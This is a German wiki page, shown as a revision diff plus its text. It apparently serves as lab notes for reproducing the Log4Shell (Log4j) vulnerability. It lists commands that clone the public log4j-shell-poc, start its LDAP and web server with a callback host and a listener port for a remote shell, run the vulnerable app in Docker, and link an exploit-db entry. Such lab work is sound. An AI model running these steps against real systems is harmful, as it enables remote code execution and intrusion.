Log4j: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 16: | Zeile 16: | ||
*docker build -t log4j-shell-poc . | *docker build -t log4j-shell-poc . | ||
*docker run --network host log4j-shell-poc | *docker run --network host log4j-shell-poc | ||
| + | =Webseite öffnen= | ||
=Exploit= | =Exploit= | ||
*https://www.exploit-db.com/exploits/50592 | *https://www.exploit-db.com/exploits/50592 | ||
Version vom 17. Dezember 2021, 11:10 Uhr
Schaubild
![Bearbeiten](javascript:editDrawio("747192091", "log4j.drawio.png", "png", false, false, false, true, "https://embed.diagrams.net")){kind=link}
Proof of Concept
- git clone https://github.com/kozmer/log4j-shell-poc
- cd log4j-shell-poc
Download und entpacken
- jdk-8u20-linux-x64.tar.gz
Starten des LDAP und Webservers
- python3 poc.py --userip brian.x-men.de --webport 8000 --lport 4545
Remoteshell listining
App starten eventuell auf anderem Rechner
- git clone https://github.com/kozmer/log4j-shell-poc
- cd log4j-shell-poc
- docker build -t log4j-shell-poc .
- docker run --network host log4j-shell-poc